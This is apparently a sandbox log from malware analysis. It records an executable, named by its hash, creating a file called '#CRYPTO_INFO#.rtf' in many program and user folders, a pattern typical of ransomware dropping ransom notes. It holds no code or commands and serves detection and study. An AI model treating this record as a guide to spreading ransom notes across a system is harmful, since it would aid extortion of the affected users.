8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\DesktopLearning_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\storage\permanent\chrome\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\AU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\MF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 